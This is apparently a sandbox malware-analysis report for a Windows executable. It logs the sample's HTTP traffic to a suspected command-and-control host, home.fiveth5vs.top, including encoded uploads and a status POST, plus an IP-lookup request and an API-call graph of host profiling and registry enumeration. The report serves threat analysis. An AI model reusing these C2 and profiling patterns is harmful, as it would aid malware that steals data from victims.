                                Data Ascii: 4s+JXxt8E\/ED4ieE7Cb4nXniTXZfEPw98RfDTwHpEl14p8O6\/4MsNd16+1DRvFWpaFfeKdM1S78Nabotpe2+g3s\/+T3GHEcMLxjwlh8DLNMweTTzXMOJcFkWGxOZ1MFluKwMcHhJ5jhMFTrShOpiq0cRQhWjGpPB4bHvDRqYiWHhV\/wB5fAbwlxOc+AfjnmnElLg3hWHH1Dgjhjwi4h8Ss1yrg7C8Q8WZPxLLP88w\/Cmec
                                Dec 31, 2024 15:42:06.592029095 CET2472OUTData Raw: 2b 6d 5c 2f 62 5c 2f 41 45 58 74 78 5c 2f 6e 46 4d 6b 62 2b 2b 6d 5c 2f 5c 2f 41 4a 62 66 75 5c 2f 38 41 6c 6a 5c 2f 2b 75 70 39 72 35 79 5c 2f 72 35 6e 51 51 74 39 31 39 5c 2f 77 41 69 66 39 63 76 33 5c 2f 38 41 6e 36 6e 39 61 5a 35 6e 33 4f 6e
                                Data Ascii: +m\/b\/AEXtx\/nFMkb++m\/\/AJbfu\/8Alj\/+up9r5y\/r5nQQt919\/wAif9cv3\/8An6n9aZ5n3On\/AH96\/wCf5Gp9r\/cc\/P5v733471V2vIoT93tk\/wCWfleQef1559uaoB8n7tkz5iPb5lijllx0HfrR5btH9zfiLzYo\/N\/f\/Zx7cD\/6\/wCgdse9H\/55eV\/XH+eaPnP3Ek\/1vm2vp+Wf89qAK3lq38G
                                Dec 31, 2024 15:42:06.592170954 CET4944OUTData Raw: 72 78 61 38 52 36 75 5a 34 48 67 44 77 77 38 52 65 4f 73 58 77 33 6a 61 56 4c 69 50 44 63 48 63 45 38 53 38 54 56 2b 48 36 2b 49 57 4c 6f 34 57 68 6e 64 48 4a 63 74 78 31 54 4b 61 2b 4c 71 59 4c 4d 4b 65 46 70 59 36 46 43 64 65 65 58 34 36 4e 4a
                                Data Ascii: rxa8R6uZ4HgDww8ReOsXw3jaVLiPDcHcE8S8TV+H6+IWLo4WhndHJctx1TKa+LqYLMKeFpY6FCdeeX46NJSlhayh\/2SZp4oeF\/ANDK8Zxx4kcA8GYXiLDVavD+I4r4w4e4do57h8OsJVxVfJqucZjg6eZ0cNSx2BqYirgpV4UYY\/ByqSUcTRc\/0D0Z+Iycnpj16HP8q\/Av\/gpR4E8MeCf2iornwxpi6afHXgbTPHfiKOJ
                                Dec 31, 2024 15:42:06.592197895 CET2472OUTData Raw: 6e 2b 66 70 33 78 7a 5c 2f 53 6e 70 47 4e 72 5c 2f 75 59 39 6d 50 34 5c 2f 70 78 61 5c 2f 77 44 58 39 33 70 6b 6d 66 4d 66 5c 2f 77 42 70 5c 2f 75 49 50 54 36 2b 5c 2f 57 73 7a 55 5a 48 73 38 77 37 38 37 5c 2f 77 44 56 53 5c 2f 38 41 79 56 2b 48
                                Data Ascii: n+fp3xz\/SnpGNr\/uY9mP4\/pxa\/wDX93pkmfMf\/wBp\/uIPT6+\/WszUZHs8w787\/wDVS\/8AyV+H9KYJC3zo+X\/55\/8ATvj0z16U\/cnzo7\/JL9n\/AOWv\/k1\/TrUPzrv2J5f7v\/Vx\/wDLb\/Su\/wCn+eaDoIZG3MiJl\/8Aj4x\/L\/Pf8uWeYfuIm\/8Adf0\/H\/TsdsdwPpMq\/NsGUf8Az\/ov1okyyz
                                Dec 31, 2024 15:42:06.592317104 CET2472OUTData Raw: 73 74 6e 72 47 71 61 48 4c 47 6d 71 32 37 72 4c 65 36 52 64 4e 61 58 52 74 66 50 57 31 75 4a 59 54 4b 68 4d 54 50 61 77 79 46 43 70 65 4b 4e 69 55 48 34 6a 68 66 42 76 36 4f 32 44 34 75 35 4b 48 42 5c 2f 43 66 2b 73 6c 62 42 79 7a 53 4f 56 31 70
                                Data Ascii: stnrGqaHLGmq27rLe6RdNaXRtfPW1uJYTKhMTPawyFCpeKNiUH4jhfBv6O2D4u5KHB\/Cf+slbByzSOV1p4nFYD6nTr06EsVQyHFYqtkFKMK9SlT\/cYCE4SnC0UpRb\/AKMxnj79KnMOBXLEcfcdf6o4bH08mqZzh6eFwWZ\/X8ThsRiaeCxPE2DwWH4orzrYbC4movrGZ1IThRq3k3Fo9Gkmgm+aZUWXGCSSx4zgZOTgenbnH
                                Dec 31, 2024 15:42:06.596781969 CET2472OUTData Raw: 41 34 5a 55 73 52 69 4d 56 6a 56 67 61 45 73 56 69 34 34 58 44 59 57 6a 57 72 34 69 70 52 77 38 4a 56 58 53 70 55 35 31 5a 52 6a 4c 6b 68 4a 70 6f 39 44 68 37 67 33 69 62 69 71 6e 6a 4b 32 51 5a 54 57 7a 43 68 6c 30 38 42 54 78 2b 49 6a 56 77 32
                                Data Ascii: A4ZUsRiMVjVgaEsVi44XDYWjWr4ipRw8JVXSpU51ZRjLkhJpo9Dh7g3ibiqnjK2QZTWzChl08BTx+IjVw2Hw2ClmeNoZdgZYvE4uvQoYeniMdiaGGjWq1I0oVKsPaThF8w+vdv2Y\/2v\/2ov2MJPGmnfAjVPhtrvgrx\/wCJJ\/GOteBvixoOu6no9h4puLC30+71rSLzwtrGha1Hc6jbW1nFeRnU4bUw6TpUbW05ild\/PvHH
                                Dec 31, 2024 15:42:06.596818924 CET4944OUTData Raw: 47 44 55 42 61 79 51 58 4c 32 54 33 4d 4d 58 32 75 4f 32 75 4c 61 65 57 44 7a 49 34 62 6d 32 6b 64 5a 34 5c 2f 31 61 50 38 41 77 57 33 5c 2f 41 47 68 5c 2f 34 66 68 52 38 45 52 39 62 4c 78 2b 66 35 65 4f 31 72 38 61 64 64 68 30 7a 52 76 68 32 33
                                Data Ascii: GDUBayQXL2T3MMX2uO2uLaeWDzI4bm2kdZ4\/1aP8AwW3\/AGh\/4fhR8ER9bLx+f5eO1r8addh0zRvh23jex+I\/wk8YeJNP+CnwR\/aI8U\/BjwjrnxGl+LfhD4QftAx+C18AeMdTtfE\/wm8K\/D3W7JL\/AOIvgfSvE8Hgb4i+Lb7w5e+JtNkvrX+zjcX8DPEw0LQPiFqHwosfir8FPFXxI8Jw\/GmP4peCtB8TfEODW\/h
                                Dec 31, 2024 15:42:06.596900940 CET2472OUTData Raw: 5c 2f 6c 5c 2f 6e 36 56 50 48 2b 37 47 39 50 6b 66 5c 2f 41 4a 5a 64 76 38 39 4f 5c 2f 70 55 50 6c 76 38 41 4f 5c 2f 50 2b 54 39 50 31 50 35 38 55 41 52 78 37 31 32 5a 54 5a 35 6e 37 72 39 35 5c 2f 68 5c 2f 68 2b 74 51 73 79 52 53 66 38 74 50 38
                                Data Ascii: \/l\/n6VPH+7G9Pkf\/AJZdv89O\/pUPlv8AO\/P+T9P1P58UARx712ZTZ5n7r95\/h\/h+tQsyRSf8tP8Anl38j7P\/AFz\/ADqy0n8aGN3kz+7k\/wA+n+exZHG8cbj7\/eXig6CH5U2b\/L2f88\/5f\/Xpf3nlumz\/AJZfvZPN\/wDJX\/P1pI1+5sXY5lz5cnH+TQvzLs3x\/wDTLzOv6j\/jxrT2nl+P\/AA\/X749aZ
                                Dec 31, 2024 15:42:09.666174889 CET138INHTTP/1.1 200 OK
                                server: nginx/1.22.1
                                date: Tue, 31 Dec 2024 14:42:09 GMT
                                content-type: text/html; charset=utf-8
                                content-length: 1
                                Data Raw: 30
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.1049706176.53.146.223802788C:\Users\user\Desktop\joE9s9sbv0.exe
                                TimestampBytes transferredDirectionData
                                Dec 31, 2024 15:42:10.837517023 CET98OUTGET /KhxTILlSHLygUudVWlQk1735537737?argument=0 HTTP/1.1
                                Host: home.fiveth5vs.top
                                Accept: */*
                                Dec 31, 2024 15:42:11.620419979 CET353INHTTP/1.1 404 NOT FOUND
                                server: nginx/1.22.1
                                date: Tue, 31 Dec 2024 14:42:11 GMT
                                content-type: text/html; charset=utf-8
                                content-length: 207
                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                2192.168.2.1049707176.53.146.223802788C:\Users\user\Desktop\joE9s9sbv0.exe
                                TimestampBytes transferredDirectionData
                                Dec 31, 2024 15:42:12.469966888 CET171OUTPOST /KhxTILlSHLygUudVWlQk1735537737 HTTP/1.1
                                Host: home.fiveth5vs.top
                                Accept: */*
                                Content-Type: application/json
                                Content-Length: 31
                                Data Raw: 7b 20 22 69 64 31 22 3a 20 22 30 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d
                                Data Ascii: { "id1": "0", "data": "Done1" }
                                Dec 31, 2024 15:42:13.348244905 CET353INHTTP/1.1 404 NOT FOUND
                                server: nginx/1.22.1
                                date: Tue, 31 Dec 2024 14:42:13 GMT
                                content-type: text/html; charset=utf-8
                                content-length: 207
                                Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 65 20 73 65 72 76 65 72 2e 20 49 66 20 79 6f 75 20 65 6e 74 65 72 65 64 20 74 68 65 20 55 52 4c 20 6d 61 6e 75 61 6c 6c 79 20 70 6c 65 61 73 65 20 63 68 65 63 6b 20 79 6f 75 72 20 73 70 65 6c 6c 69 6e 67 20 61 6e 64 20 74 72 79 20 61 67 61 69 6e 2e 3c 2f 70 3e 0a
                                Data Ascii: <!doctype html><html lang=en><title>404 Not Found</title><h1>Not Found</h1><p>The requested URL was not found on the server. If you entered the URL manually please check your spelling and try again.</p>


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.104970434.200.57.1144432788C:\Users\user\Desktop\joE9s9sbv0.exe
                                TimestampBytes transferredDirectionData
                                2024-12-31 14:42:04 UTC52OUTGET /ip HTTP/1.1
                                Host: httpbin.org
                                Accept: */*
                                2024-12-31 14:42:04 UTC224INHTTP/1.1 200 OK
                                Date: Tue, 31 Dec 2024 14:42:04 GMT
                                Content-Type: application/json
                                Content-Length: 31
                                Connection: close
                                Server: gunicorn/19.9.0
                                Access-Control-Allow-Origin: *
                                Access-Control-Allow-Credentials: true
                                2024-12-31 14:42:04 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                Data Ascii: { "origin": "8.46.123.189"}


                                0204060s020406080100

                                Click to jump to process

                                0204060s0.001020MB

                                Click to jump to process

                                • File
                                • Registry
                                • Network

                                Click to dive into process behavior distribution

                                Target ID:0
                                Start time:09:42:01
                                Start date:31/12/2024
                                Path:C:\Users\user\Desktop\joE9s9sbv0.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\joE9s9sbv0.exe"
                                Imagebase:0x1d0000
                                File size:4'508'160 bytes
                                MD5 hash:2CE78AC3287A074E14BD8B4AF226FD09
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:low
                                Has exited:true

                                Execution Graph

                                Execution Coverage

                                Dynamic/Packed Code Coverage

                                Signature Coverage

                                Execution Coverage:4.6%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:23.7%
                                Total number of Nodes:194
                                Total number of Limit Nodes:26
                                Show Legend
                                Hide Nodes/Edges
                                execution_graph 24971 1d255d 24972 559f70 24971->24972 24973 1d256c GetSystemInfo 24972->24973 24974 1d2589 24973->24974 24975 1d25a0 GlobalMemoryStatusEx 24974->24975 24980 1d25ec 24975->24980 24976 1d263c GetDriveTypeA 24978 1d2655 GetDiskFreeSpaceExA 24976->24978 24976->24980 24977 1d2762 24979 1d27d6 KiUserCallbackDispatcher 24977->24979 24978->24980 24981 1d27f8 24979->24981 24980->24976 24980->24977 24982 1d28d9 FindFirstFileW 24981->24982 24983 1d2906 FindNextFileW 24982->24983 24984 1d2928 24982->24984 24983->24983 24983->24984 25082 20b3c0 25083 20b3cb 25082->25083 25084 20b3ee 25082->25084 25087 1d76a0 send 25083->25087 25088 209290 25083->25088 25085 20b3ea 25087->25085 25089 1d76a0 send 25088->25089 25091 2092e5 25089->25091 25090 209392 25090->25085 25091->25090 25092 209335 WSAIoctl 25091->25092 25092->25090 25093 209366 25092->25093 25093->25090 25094 209371 setsockopt 25093->25094 25094->25090 25095 1d29ff FindFirstFileA 25096 1d2a31 25095->25096 25097 1d2a5c RegOpenKeyExA 25096->25097 25098 1d2a93 25097->25098 25099 1d2ade CharUpperA 25098->25099 25101 1d2b0a 25099->25101 25100 1d2bf9 QueryFullProcessImageNameA 25102 1d2c3b CloseHandle 25100->25102 25101->25100 25104 1d2c64 25102->25104 25103 1d2df1 CloseHandle 25105 1d2e23 25103->25105 25104->25103 24985 1d3d5e 24986 1d3d30 24985->24986 24986->24985 24987 1d3d90 24986->24987 24989 1e0ab0 24986->24989 24992 1e05b0 24989->24992 24991 1e0acd 24991->24986 24993 1e07c7 24992->24993 24994 1e05bd 24992->24994 24993->24991 24994->24993 24995 1e07ef 24994->24995 24996 1e0707 WSAEventSelect 24994->24996 25006 1d76a0 24994->25006 24995->24993 25000 1e0847 24995->25000 25002 1e6fa0 24995->25002 24996->24993 24996->24994 24999 1e09e8 WSAEnumNetworkEvents 24999->25000 25001 1e09d0 WSAEventSelect 24999->25001 25000->24993 25000->24999 25000->25001 25001->24999 25001->25000 25003 1e6fd4 25002->25003 25005 1e6feb 25002->25005 25004 1e7207 select 25003->25004 25003->25005 25004->25005 25005->25000 25007 1d76e6 send 25006->25007 25008 1d76c0 25006->25008 25009 1d76c9 25007->25009 25008->25007 25008->25009 25009->24994 25010 284720 25011 284728 25010->25011 25015 284733 25011->25015 25016 289270 25011->25016 25013 284860 25019 284950 25013->25019 25023 28a440 25016->25023 25018 289297 25018->25013 25020 284966 25019->25020 25021 284aa0 gethostname 25020->25021 25022 2849c5 25020->25022 25021->25020 25021->25022 25022->25015 25024 28a46b 25023->25024 25026 28a48b GetAdaptersAddresses 25024->25026 25055 28a4db 25024->25055 25025 28aa03 RegOpenKeyExA 25027 28ab70 RegOpenKeyExA 25025->25027 25028 28aa27 RegQueryValueExA 25025->25028 25043 28a4a6 25026->25043 25026->25055 25031 28ab90 25027->25031 25032 28ac34 RegOpenKeyExA 25027->25032 25029 28aacc RegQueryValueExA 25028->25029 25030 28aa71 25028->25030 25034 28ab0e 25029->25034 25035 28ab66 RegCloseKey 25029->25035 25030->25029 25040 28aa85 RegQueryValueExA 25030->25040 25031->25032 25033 28acf8 RegOpenKeyExA 25032->25033 25054 28ac54 25032->25054 25036 28ad14 25033->25036 25037 28ad56 RegEnumKeyExA 25033->25037 25034->25035 25044 28ab1e RegQueryValueExA 25034->25044 25035->25027 25036->25018 25037->25036 25039 28ad9b 25037->25039 25038 28a4f3 GetAdaptersAddresses 25050 28a505 25038->25050 25038->25055 25041 28ae16 RegOpenKeyExA 25039->25041 25042 28aab3 25040->25042 25045 28addf RegEnumKeyExA 25041->25045 25046 28ae34 RegQueryValueExA 25041->25046 25042->25029 25043->25038 25043->25055 25049 28ab4c 25044->25049 25045->25036 25045->25041 25048 28af43 RegQueryValueExA 25046->25048 25056 28adaa 25046->25056 25047 28a527 GetAdaptersAddresses 25047->25055 25051 28b052 RegQueryValueExA 25048->25051 25048->25056 25049->25035 25050->25047 25050->25055 25052 28adc7 RegCloseKey 25051->25052 25051->25056 25052->25045 25053 28afa0 RegQueryValueExA 25053->25056 25054->25033 25055->25025 25055->25036 25056->25048 25056->25051 25056->25052 25056->25053 25057 29a920 25058 29a944 25057->25058 25059 29a94b 25058->25059 25060 29a977 send 25058->25060 25106 29b180 25108 29b2e3 25106->25108 25110 29b19b 25106->25110 25110->25108 25111 29b2a9 getsockname 25110->25111 25113 29b020 closesocket 25110->25113 25114 29af30 25110->25114 25118 29b060 25110->25118 25123 29b020 25111->25123 25113->25110 25115 29af4c 25114->25115 25116 29af63 socket 25114->25116 25115->25116 25117 29af52 25115->25117 25116->25110 25117->25110 25119 29b080 25118->25119 25120 29b0b0 connect 25119->25120 25121 29b0bf WSAGetLastError 25119->25121 25122 29b0ea 25119->25122 25120->25121 25121->25119 25121->25122 25122->25110 25124 29b029 25123->25124 25125 29b052 25123->25125 25126 29b04b closesocket 25124->25126 25127 29b03e 25124->25127 25125->25110 25126->25125 25127->25110 25128 29a080 25131 299740 25128->25131 25130 29a09b 25132 299780 25131->25132 25136 29975d 25131->25136 25133 299925 RegOpenKeyExA 25132->25133 25132->25136 25134 29995a RegQueryValueExA 25133->25134 25133->25136 25135 299986 RegCloseKey 25134->25135 25135->25136 25136->25130 25137 29a8c0 25138 29a903 recvfrom 25137->25138 25139 29a8e6 25137->25139 25140 29a8ed 25138->25140 25139->25138 25139->25140 25061 1d2f17 25069 1d2f2c 25061->25069 25062 1d31d3 25063 1d2fb3 RegOpenKeyExA 25063->25069 25064 1d315c RegEnumKeyExA 25065 1d31b2 RegCloseKey 25064->25065 25064->25069 25065->25069 25066 1d3046 RegOpenKeyExA 25067 1d3089 RegQueryValueExA 25066->25067 25066->25069 25068 1d313b RegCloseKey 25067->25068 25067->25069 25068->25069 25069->25062 25069->25063 25069->25064 25069->25066 25069->25068 25070 1d31d7 25073 1d31f4 25070->25073 25071 1d3200 25072 1d32dc CloseHandle 25072->25071 25073->25071 25073->25072 25074 2095b0 25075 2095c8 25074->25075 25076 2095fd 25074->25076 25075->25076 25078 20a150 25075->25078 25079 20a15f 25078->25079 25081 20a1d0 25078->25081 25080 20a181 getsockname 25079->25080 25079->25081 25080->25081 25081->25076 25141 208b50 25142 208b6b 25141->25142 25156 208bb5 25141->25156 25142->25156 25157 208b8f 25142->25157 25158 20a550 25142->25158 25144 208bfc 25148 208c35 25144->25148 25149 208c1f connect 25144->25149 25154 208cb2 25144->25154 25144->25156 25145 208cd9 SleepEx getsockopt 25146 208d18 25145->25146 25150 208d43 25146->25150 25146->25154 25147 20a150 getsockname 25155 208dff 25147->25155 25152 20a150 getsockname 25148->25152 25149->25148 25153 20a150 getsockname 25150->25153 25152->25157 25153->25156 25154->25147 25154->25155 25154->25156 25155->25156 25171 1d78b0 closesocket 25155->25171 25157->25145 25157->25154 25157->25156 25159 20a575 25158->25159 25164 20a597 25159->25164 25173 1d75e0 25159->25173 25161 1d78b0 closesocket 25163 20a713 25161->25163 25162 20a811 setsockopt 25170 20a83b 25162->25170 25163->25144 25164->25162 25169 20a69b 25164->25169 25164->25170 25166 20af56 25167 20af5d 25166->25167 25166->25169 25167->25163 25168 20a150 getsockname 25167->25168 25168->25163 25169->25161 25169->25163 25170->25169 25178 2367e0 ioctlsocket 25170->25178 25172 1d78c5 25171->25172 25172->25156 25174 1d75ef 25173->25174 25175 1d7607 socket 25173->25175 25174->25175 25177 1d7643 25174->25177 25176 1d762b 25175->25176 25176->25164 25177->25164 25178->25166 25179 1ed5e0 25180 1ed652 WSAStartup 25179->25180 25181 1ed5f0 25179->25181 25180->25181

                                Executed Functions

                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                • Associated: 00000000.00000002.1683589992.00000000001D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684138967.00000000008D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684537574.0000000000C75000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684682886.0000000000E33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684702957.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID:
                                • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connected to %s (%s) port %u$Connection time-out$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed$connect.c$created %s (timeout %lldms)$ipv4$ipv6
                                • API String ID: 0-1590685507
                                • Opcode ID: 076fe8ffee2c8929f01d7b6a3771530c3dea4c2460ac5f5ed232e1ab54fd0280
                                • Instruction ID: 7576d0a113d19d1ff95e3413ff6d2ad4d6a2f39180d8ad67a8956f7aa6868743
                                • Opcode Fuzzy Hash: 076fe8ffee2c8929f01d7b6a3771530c3dea4c2460ac5f5ed232e1ab54fd0280
                                • Instruction Fuzzy Hash: 1BC2E031A143459FD764CF28C580B6AB7E1BF98314F04C66DEC988B6A2D771EDA4CB81

                                Control-flow Graph

                                APIs
                                • GetSystemInfo.KERNELBASE ref: 001D2579
                                • GlobalMemoryStatusEx.KERNELBASE ref: 001D25CC
                                • GetDriveTypeA.KERNELBASE ref: 001D2647
                                • GetDiskFreeSpaceExA.KERNELBASE ref: 001D267E
                                • KiUserCallbackDispatcher.NTDLL ref: 001D27E2
                                • FindFirstFileW.KERNELBASE ref: 001D28F8
                                • FindNextFileW.KERNELBASE ref: 001D291F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                • Associated: 00000000.00000002.1683589992.00000000001D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684138967.00000000008D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C66000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C74000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684537574.0000000000C75000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684682886.0000000000E33000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684702957.0000000000E35000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: FileFind$CallbackDiskDispatcherDriveFirstFreeGlobalInfoMemoryNextSpaceStatusSystemTypeUser
                                • String ID: @$`$gkw
                                • API String ID: 3271271169-2923762694
                                • Opcode ID: 24a3e7b03a02b39b219b109ebc56c8009665b346e5cbb90c6f57e745e78241ad
                                • Instruction ID: a4ae8f7aabf307e79569f4ddfd4c7dd3ca71a978573050d1e373d6b490850623
                                • Opcode Fuzzy Hash: 24a3e7b03a02b39b219b109ebc56c8009665b346e5cbb90c6f57e745e78241ad
                                • Instruction Fuzzy Hash: C5D1C2B49047099FCB50EF68C58569EBBF1BF48344F10896EE898D7351E7349A88CF92

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1299 1d29ff-1d2a2f FindFirstFileA 1300 1d2a38 1299->1300 1301 1d2a31-1d2a36 1299->1301 1302 1d2a3d-1d2a91 call 686790 call 686820 RegOpenKeyExA 1300->1302 1301->1302 1307 1d2a9a 1302->1307 1308 1d2a93-1d2a98 1302->1308 1309 1d2a9f-1d2b0c call 686790 call 686820 CharUpperA call 558da0 1307->1309 1308->1309 1317 1d2b0e-1d2b13 1309->1317 1318 1d2b15 1309->1318 1319 1d2b1a-1d2b92 call 686790 call 686820 call 558e80 call 558e70 1317->1319 1318->1319 1328 1d2bcc-1d2c66 QueryFullProcessImageNameA CloseHandle call 558da0 1319->1328 1329 1d2b94-1d2ba3 1319->1329 1339 1d2c6f 1328->1339 1340 1d2c68-1d2c6d 1328->1340 1332 1d2ba5-1d2bae 1329->1332 1333 1d2bb0-1d2bca call 558e68 1329->1333 1332->1328 1333->1328 1333->1329 1341 1d2c74-1d2ce9 call 686790 call 686820 call 558e80 call 558e70 1339->1341 1340->1341 1350 1d2dcf-1d2e1c call 686790 call 686820 CloseHandle 1341->1350 1351 1d2cef-1d2d49 call 558bb0 call 558da0 1341->1351 1361 1d2e23-1d2e2e 1350->1361 1362 1d2d99-1d2dad 1351->1362 1363 1d2d4b-1d2d63 call 558da0 1351->1363 1364 1d2e37 1361->1364 1365 1d2e30-1d2e35 1361->1365 1362->1350 1363->1362 1371 1d2d65-1d2d7d call 558da0 1363->1371 1367 1d2e3c-1d2ed6 call 686790 call 686820 1364->1367 1365->1367 1380 1d2ed8-1d2ee1 1367->1380 1381 1d2eea 1367->1381 1371->1362 1377 1d2d7f-1d2d97 call 558da0 1371->1377 1377->1362 1385 1d2daf-1d2dc9 call 558e68 1377->1385 1380->1381 1383 1d2ee3-1d2ee8 1380->1383 1384 1d2eef-1d2f16 call 686790 call 686820 1381->1384 1383->1384 1385->1350 1385->1351
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                • Associated: 00000000.00000002.1683589992.00000000001D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008AE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008CF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1683616047.00000000008D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684138967.00000000008D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.00000000008D6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000B7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1684161804.0000000000C5D000.00000040.00000001.01000000.00000003.sdmpDownload File
